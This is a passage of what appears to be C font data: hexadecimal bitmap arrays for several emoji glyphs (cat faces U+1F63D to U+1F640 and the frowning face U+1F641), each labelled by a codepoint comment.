0x83, 0x80, 0x0, 0xc3, 0x80, 0x3, 0x84, 0x0,
0x0, 0x0, 0x0, 0x0, 0x43, 0x80, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0xc0, 0x6, 0x0, 0x0,
0x0, 0xc0, 0x7, 0x0, 0x1, 0xc0, 0x7, 0x0,
0x0, 0x1, 0xc0, 0x7, 0x0, 0x1, 0xc0, 0xf,
0x80, 0x0, 0x3, 0xe0, 0x7, 0x0, 0x1, 0xc0,
0xf, 0xe0, 0x0, 0xf, 0xe0, 0x7, 0x0, 0x1,
0xc0, 0xf, 0xe0, 0x0, 0xf, 0xe0, 0x3, 0x80,
0xff, 0x80, 0x7, 0xe0, 0x0, 0xf, 0xc0, 0x3,
0xfe, 0xff, 0xf8, 0x7, 0xc0, 0x0, 0x7, 0xc0,
0x3f, 0xfe, 0x3, 0xf8, 0x3, 0x80, 0x0, 0x3,
0x0, 0x3f, 0x80, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x3, 0x80, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x3, 0x80, 0x3, 0x80, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0x1, 0x80,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0xf,
0xfc, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x7f, 0xe0,
0xff, 0xfc, 0x0, 0x0, 0x38, 0x0, 0x0, 0x7f,
0xfe, 0xf9, 0xc0, 0x0, 0x0, 0x38, 0x3, 0x80,
0x7, 0x3e, 0x41, 0xc0, 0x0, 0x0, 0x18, 0x3,
0x0, 0x7, 0x2, 0x1, 0xc0, 0x0, 0x0, 0x18,
0x7, 0x0, 0x7, 0x0, 0x0, 0xef, 0x0, 0x0,
0x18, 0x1e, 0x1, 0xe7, 0x0, 0x0, 0xff, 0x0,
0x0, 0x7f, 0xfc, 0x1, 0xfe, 0x0, 0x1, 0xfe,
0x0, 0x1f, 0xf7, 0xf0, 0x0, 0xff, 0x0, 0x7,
0xf0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x1f, 0xc0,
0xf, 0xb0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1d,
0xe0, 0x1e, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0xf0, 0xc, 0x1c, 0x0, 0x0, 0x60, 0x0,
0x0, 0x78, 0x60, 0x0, 0xe, 0x0, 0x0, 0x3f,
0x80, 0x0, 0xf0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F63D "😽" */
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x1, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0x60, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80, 0x30,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x80, 0x3, 0x80,
0x18, 0x0, 0x0, 0x0, 0x38, 0x1, 0x80, 0x7,
0x0, 0xc, 0x0, 0x0, 0x0, 0x70, 0x1, 0xc0,
0x7, 0x4, 0x6, 0x0, 0x0, 0x0, 0xe0, 0x41,
0xc0, 0x7, 0xe, 0x7, 0x0, 0x0, 0x1, 0xc0,
0xe1, 0xc0, 0x7, 0xf, 0x3, 0x87, 0xff, 0xc3,
0x81, 0xe1, 0xc0, 0x7, 0xf, 0x81, 0xff, 0xff,
0xff, 0x3, 0xe1, 0xc0, 0x7, 0xf, 0xc0, 0xff,
0xc7, 0xff, 0x7, 0xe1, 0xc0, 0x7, 0xf, 0xe0,
0xbf, 0xc7, 0xfa, 0xf, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0x1f, 0xc7, 0xf0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0xf, 0xc7, 0xe0, 0x7,
0xe1, 0xc0, 0x7, 0xf, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x7, 0x83,
0xc0, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x7,
0x83, 0x80, 0x0, 0xc1, 0x80, 0x3, 0x84, 0x0,
0x0, 0x0, 0x0, 0x0, 0x43, 0x80, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x61, 0xc0, 0x7,
0xc0, 0x0, 0x7, 0xc0, 0x7, 0xc, 0xf9, 0xc0,
0x1f, 0xe0, 0x0, 0xf, 0xe0, 0x7, 0x3e, 0x3f,
0xc0, 0x3c, 0x70, 0x0, 0x1c, 0x78, 0x3, 0xf8,
0xf, 0xc0, 0x38, 0x38, 0x0, 0x38, 0x38, 0x7,
0xe0, 0x3, 0xf0, 0x70, 0x1c, 0x0, 0x70, 0x1c,
0x1f, 0x80, 0x3, 0xf8, 0x20, 0x18, 0x0, 0x0,
0x8, 0x3f, 0x80, 0x3, 0xb0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1b, 0x80, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0xfb, 0x80, 0x0,
0x0, 0x7c, 0x0, 0x0, 0x3, 0xbe, 0xff, 0xf8,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3f, 0xfe, 0x1f,
0xf8, 0x0, 0x0, 0xfe, 0x0, 0x0, 0x3f, 0xf0,
0x1, 0xf8, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x3b,
0x80, 0x1, 0xc0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x7, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3, 0x80,
0x0, 0x7, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x3f, 0x0, 0x3, 0xf8, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x3f, 0x80, 0x1f, 0xe0, 0x0,
0x0, 0x7, 0x80, 0x0, 0xf, 0xf0, 0x7f, 0x60,
0x0, 0x0, 0x7, 0x0, 0x0, 0xf, 0xfc, 0x78,
0x70, 0x0, 0x0, 0x3, 0x80, 0x0, 0x1c, 0x3c,
0x0, 0x70, 0x0, 0x0, 0x1, 0x80, 0x0, 0x1c,
0x0, 0x0, 0x38, 0x0, 0x0, 0x1, 0x80, 0x0,
0x38, 0x0, 0x0, 0x1c, 0x0, 0x0, 0xf, 0x80,
0x0, 0x78, 0x0, 0x0, 0x1e, 0x0, 0x0, 0xe,
0x0, 0x0, 0x70, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F63E "😾" */
0x0, 0x8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x20,
0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfc, 0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0,
0x1, 0xfe, 0x0, 0x1, 0xef, 0x80, 0x0, 0x0,
0x0, 0x3, 0xef, 0x0, 0x1, 0xdd, 0xc0, 0x0,
0x0, 0x0, 0x7, 0x77, 0x0, 0x3, 0xdc, 0xe0,
0x0, 0x0, 0x0, 0x6, 0x73, 0x80, 0x3, 0x9c,
0xe0, 0x0, 0x0, 0x0, 0xe, 0x73, 0x80, 0x3,
0x9c, 0x70, 0x0, 0x0, 0x0, 0x1c, 0x71, 0x80,
0x7, 0x9c, 0x38, 0x0, 0x0, 0x0, 0x38, 0x71,
0xc0, 0x7, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x70,
0x71, 0xc0, 0x7, 0x1c, 0xf, 0xf, 0xff, 0xe1,
0xe0, 0x71, 0xc0, 0x7, 0x1c, 0x7, 0xff, 0xff,
0xff, 0xc0, 0x71, 0xc0, 0x7, 0x1c, 0x3, 0xff,
0xc7, 0xff, 0x80, 0x71, 0xc0, 0x7, 0xe, 0x0,
0xbf, 0xc7, 0xfa, 0x0, 0xe1, 0xc0, 0x7, 0xe,
0x0, 0x1f, 0xc7, 0xf0, 0x0, 0xe1, 0xc0, 0x7,
0xe, 0x0, 0x1f, 0xc7, 0xf0, 0x0, 0xe1, 0xc0,
0x7, 0x7, 0x0, 0x1f, 0xc7, 0xf0, 0x1, 0xc1,
0xc0, 0x7, 0x7, 0x0, 0xf, 0xc7, 0xe0, 0x1,
0xc1, 0xc0, 0x7, 0x3, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0x81, 0xc0, 0x3, 0x87, 0x80, 0x7, 0xc7,
0xc0, 0x3, 0xc1, 0xc0, 0x3, 0x8e, 0x0, 0x3,
0x83, 0x80, 0x0, 0xe1, 0x80, 0x3, 0x9c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x73, 0x80, 0x3, 0xb8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3b, 0x80, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b, 0x80,
0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0x80, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0xe0, 0x4, 0x0, 0x0,
0x0, 0x40, 0xf, 0x0, 0x41, 0xc0, 0xf, 0x0,
0x0, 0x1, 0xe0, 0x7, 0x4, 0x71, 0xc0, 0xf,
0x80, 0x0, 0x3, 0xe0, 0x7, 0x1c, 0xfd, 0xc0,
0xf, 0xe0, 0x0, 0xf, 0xe0, 0x7, 0x7e, 0x3f,
0x80, 0xf, 0xe0, 0x0, 0xf, 0xe0, 0x3, 0xf8,
0x7, 0xe0, 0xf, 0xe0, 0x0, 0xf, 0xe0, 0xf,
0xe0, 0x3, 0xf8, 0x7, 0xc0, 0x0, 0x7, 0xc0,
0x3f, 0x80, 0x3, 0xf0, 0x3, 0x80, 0x0, 0x3,
0x80, 0x1f, 0x80, 0x3, 0x90, 0x0, 0x0, 0x0,
0x0, 0x0, 0x13, 0x80, 0xfb, 0x80, 0x0, 0x0,
0xfc, 0x0, 0x0, 0x3, 0x9e, 0xff, 0xe0, 0x0,
0x0, 0xfe, 0x0, 0x0, 0xf, 0xfe, 0x7f, 0xf8,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x1f, 0xfc, 0x1,
0xf0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x1f, 0x80,
0x1, 0x80, 0x0, 0x0, 0x38, 0x0, 0x0, 0x3,
0x80, 0x1, 0xc0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x7, 0x0, 0x1, 0xd8, 0x0, 0x0, 0x38, 0x0,
0x0, 0x37, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x38,
0x0, 0x0, 0x3f, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x38, 0x0, 0x0, 0x3f, 0xc0, 0x1f, 0xe0, 0x0,
0x0, 0xfe, 0x0, 0x0, 0xf, 0xf0, 0x7f, 0x60,
0x0, 0x7, 0xff, 0xc0, 0x0, 0xf, 0xfc, 0x78,
0x70, 0x0, 0x1f, 0xc7, 0xf0, 0x0, 0x1c, 0x3c,
0x0, 0x70, 0x0, 0x3c, 0x0, 0xf8, 0x0, 0x1c,
0x0, 0x0, 0x38, 0x0, 0x78, 0x0, 0x3c, 0x0,
0x38, 0x0, 0x0, 0x1c, 0x0, 0x20, 0x0, 0x8,
0x0, 0x78, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F63F "😿" */
0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0x80, 0x7, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xc0, 0x7, 0xf, 0x80, 0x0, 0x0, 0x0,
0x3, 0xf0, 0xe0, 0xe, 0x1, 0xe0, 0x0, 0x0,
0x0, 0xf, 0x80, 0x60, 0xe, 0x0, 0x78, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x60, 0xe, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x78, 0x0, 0x70, 0xe, 0x0,
0x7, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x70, 0xe,
0x18, 0x3, 0xc0, 0x0, 0x3, 0xc0, 0x18, 0x70,
0xe, 0x1f, 0x0, 0xef, 0xff, 0xef, 0x0, 0xf8,
0x60, 0xe, 0x1f, 0x80, 0x7f, 0xff, 0xfe, 0x3,
0xf8, 0x60, 0x7, 0x1f, 0xe0, 0x3f, 0xc7, 0xfc,
0x7, 0xf0, 0x60, 0x7, 0xf, 0xf8, 0x3f, 0xc7,
0xf8, 0x1f, 0xf0, 0xe0, 0x7, 0xf, 0xf8, 0x1f,
0xc7, 0xf8, 0x1f, 0xf0, 0xc0, 0x3, 0x87, 0xe0,
0x1f, 0xc7, 0xf0, 0xf, 0xe0, 0xc0, 0x3, 0x87,
0xc0, 0x1f, 0xc7, 0xf0, 0x3, 0xe1, 0xc0, 0x3,
0x83, 0x80, 0xf, 0xc7, 0xe0, 0x1, 0xc1, 0x80,
0x1, 0xc3, 0x0, 0xf, 0xc7, 0xe0, 0x0, 0xc3,
0x80, 0x1, 0xc0, 0x0, 0x7, 0x83, 0xc0, 0x0,
0x3, 0x0, 0x0, 0xe0, 0x0, 0x3, 0x83, 0x80,
0x0, 0x7, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x60, 0x0, 0x60, 0x0, 0x6, 0x0, 0x6,
0x0, 0x0, 0xe0, 0x3, 0xe0, 0x0, 0x7, 0x80,
0x6, 0x0, 0x0, 0xe0, 0x7, 0xe0, 0x0, 0xf,
0xe0, 0x7, 0x0, 0x0, 0xc0, 0xf, 0xe0, 0x0,
0xf, 0xe0, 0x7, 0x0, 0x0, 0xc0, 0xf, 0xe0,
0x0, 0x7, 0xe0, 0x3, 0x0, 0x1, 0xc0, 0xf,
0xe0, 0x0, 0x7, 0xe0, 0x3, 0x80, 0x1, 0xf0,
0x7, 0xc0, 0x0, 0x3, 0xe0, 0xf, 0x80, 0x3,
0xf8, 0x1, 0x0, 0x0, 0x0, 0x80, 0x1f, 0x80,
0xf, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xf0, 0x3f, 0x80, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x3, 0xfc, 0xfd, 0x80, 0x0, 0x0, 0xfe, 0x0,
0x0, 0x3, 0xbe, 0x61, 0xc0, 0x0, 0x0, 0xfe,
0x0, 0x0, 0x3, 0x8e, 0x1, 0xf8, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x3f, 0x80, 0x1, 0xf8, 0x8,
0x0, 0x38, 0x0, 0x0, 0x1f, 0x80, 0x1, 0xe0,
0xc, 0x0, 0x38, 0x0, 0x0, 0x7, 0x80, 0x7,
0xc0, 0xc, 0x0, 0x38, 0x0, 0x0, 0x7, 0xc0,
0xf, 0xc0, 0x1e, 0x0, 0x38, 0x0, 0x0, 0x7,
0xe0, 0x1e, 0xe0, 0x1e, 0x0, 0x38, 0x0, 0x0,
0x7, 0x70, 0x3c, 0xee, 0x3f, 0x0, 0x7c, 0x0,
0x0, 0x77, 0x38, 0x38, 0x7e, 0x33, 0x0, 0xff,
0x0, 0x0, 0x7e, 0x1c, 0x10, 0x7c, 0x73, 0x81,
0xe7, 0x80, 0x0, 0x3e, 0x8, 0x0, 0x78, 0x61,
0x83, 0x83, 0xc0, 0x0, 0x1e, 0x0, 0x0, 0x78,
0xe1, 0xc7, 0x1, 0xe0, 0x0, 0x1e, 0x0, 0x0,
0xf8, 0xc1, 0xc6, 0x0, 0xc0, 0x0, 0x3f, 0x0,
0x0, 0xdd, 0xc0, 0xe0, 0x0, 0x0, 0x0, 0x7b,
0x0, 0x1, 0xcf, 0xc0, 0xe0, 0x0, 0x0, 0x0,
0xf3, 0x80, 0x1, 0x87, 0x80, 0x60, 0x0, 0x0,
0x0, 0xe1, 0x80, 0x3, 0x87, 0x80, 0x60, 0x0,
0x0, 0x1, 0xc1, 0xc0, 0x0, 0x3, 0x80, 0x70,
0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x1, 0x80,
0x60, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x1,
0x80, 0x60, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0,
0x1, 0xc0, 0xe0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1, 0xe1, 0xe0, 0x0, 0x3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xfc, 0x0, 0x3f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xc0, 0x0, 0x0, 0x0,
/* U+1F640 "🙀" */
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x1,
0xfc, 0x0, 0x0, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x1, 0x8e, 0x0, 0x1, 0xc1, 0x80, 0x0, 0x0,
0x0, 0x3, 0x7, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0xe0,
0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80,
0x60, 0x0, 0x0, 0x0, 0xc, 0x3, 0x80, 0x3,
0x80, 0x70, 0x0, 0x0, 0x0, 0x1c, 0x1, 0xc0,
0x7, 0x4, 0x38, 0x0, 0x0, 0x0, 0x38, 0x41,
0xc0, 0x7, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x70,
0xe1, 0xc0, 0x7, 0xe, 0xf, 0x1f, 0xff, 0xf1,
0xe0, 0xe1, 0xc0, 0x7, 0xf, 0x7, 0xff, 0xff,
0xff, 0xc1, 0xe1, 0xc0, 0x7, 0xf, 0x83, 0xff,
0xc7, 0xff, 0x83, 0xe1, 0xc0, 0x7, 0xf, 0xc0,
0xbf, 0xc7, 0xfa, 0x7, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x3f, 0xc7, 0xf8, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0x1f, 0xc7, 0xf0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0xf, 0xc7, 0xe0, 0x7,
0xe1, 0xc0, 0x7, 0xf, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x7, 0x83,
0xc0, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x3,
0x83, 0x80, 0x0, 0xc1, 0x80, 0x3, 0x84, 0xf,
0xc0, 0x0, 0x7, 0xe0, 0x43, 0x80, 0x3, 0x80,
0x1f, 0xf0, 0x0, 0x1f, 0xf0, 0x3, 0x80, 0x1,
0x80, 0x3e, 0xf8, 0x0, 0x3e, 0xf8, 0x3, 0x80,
0x1, 0xc0, 0x70, 0x38, 0x0, 0x38, 0x1c, 0x7,
0x0, 0x1, 0xc0, 0x70, 0x1c, 0x0, 0x70, 0x1c,
0x7, 0x0, 0x0, 0xc0, 0x60, 0xc, 0x0, 0x60,
0xc, 0x7, 0x0, 0x0, 0xc0, 0xe0, 0xc, 0x0,
0x60, 0xe, 0x6, 0x0, 0x0, 0xc0, 0xe0, 0xc,
0x0, 0x60, 0xe, 0x7, 0x0, 0x71, 0xc0, 0x60,
0xc, 0x0, 0x70, 0xc, 0x7, 0x1c, 0xfd, 0xc0,
0x70, 0x1c, 0x0, 0x70, 0x1c, 0x7, 0x7e, 0x3f,
0x80, 0x78, 0x38, 0x10, 0x38, 0x3c, 0x3, 0xf8,
0xf, 0xc0, 0x3f, 0xf8, 0xfe, 0x3f, 0xf8, 0x7,
0xe0, 0x3, 0xf0, 0x1f, 0xe0, 0xfe, 0xf, 0xf0,
0x1f, 0x80, 0x3, 0xf0, 0x7, 0xc0, 0xfe, 0x7,
0xc0, 0x1f, 0x80, 0x3, 0x90, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x13, 0x80, 0xe3, 0x80, 0x8, 0x0,
0x38, 0x0, 0x20, 0x3, 0x8e, 0xff, 0xc0, 0x7f,
0x80, 0x38, 0x3, 0xfc, 0x7, 0xfe, 0xff, 0xf8,
0xff, 0xe0, 0x38, 0xf, 0xfe, 0x3f, 0xfe, 0x3,
0xf1, 0xe0, 0xf0, 0x38, 0x1e, 0xf, 0x1f, 0x80,
0x1, 0xc1, 0xc0, 0x70, 0x38, 0x1c, 0x7, 0x3,
0x80, 0x1, 0xc3, 0x80, 0x38, 0x38, 0x38, 0x3,
0x7, 0x0, 0x1, 0xc3, 0x80, 0x38, 0x38, 0x38,
0x3, 0x87, 0x0, 0x1, 0xfb, 0x80, 0x18, 0x7c,
0x30, 0x3, 0xbf, 0x0, 0x3, 0xfb, 0x80, 0x18,
0x7c, 0x30, 0x3, 0xbf, 0x80, 0x1f, 0xe3, 0x80,
0x18, 0xfe, 0x30, 0x3, 0x8f, 0xf0, 0x7f, 0x73,
0x80, 0x18, 0xfe, 0x30, 0x3, 0x8f, 0xfc, 0x78,
0x71, 0x80, 0x39, 0xff, 0x38, 0x3, 0x1c, 0x3c,
0x0, 0x39, 0x80, 0x39, 0xff, 0x38, 0x3, 0x1c,
0x0, 0x0, 0x39, 0x80, 0x39, 0xff, 0x38, 0x3,
0x38, 0x0, 0x0, 0x1d, 0x80, 0x31, 0xff, 0x18,
0x3, 0x70, 0x0, 0x0, 0xf, 0xc0, 0x31, 0xff,
0x18, 0x7, 0xf0, 0x0, 0x0, 0xf, 0xc0, 0x71,
0xff, 0x1c, 0x7, 0xe0, 0x0, 0x0, 0x7, 0xc0,
0x70, 0xfe, 0x1c, 0x7, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x60, 0x7c, 0xc, 0x7, 0x80, 0x0, 0x0,
0x1, 0x80, 0xe0, 0x0, 0xe, 0x3, 0x0, 0x0,
0x0, 0x1, 0x80, 0xe0, 0x0, 0xe, 0x3, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0xe, 0x3,
0x80, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0xe,
0x3, 0x80, 0x0, 0x0, 0x7, 0x1, 0xff, 0xef,
0xff, 0x1, 0xc0, 0x0, 0x0, 0x7, 0x1, 0xff,
0xff, 0xff, 0x1, 0xc0, 0x0, 0x0, 0xe, 0x1,
0x87, 0xff, 0xc3, 0x0, 0xc0, 0x0,
/* U+1F641 "🙁" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x1, 0xe0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x1, 0xf8, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x1, 0xfe, 0x0, 0x3,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0xff, 0x0, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x7f, 0x80, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xc0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0x1f, 0xe0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x1, 0xe0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
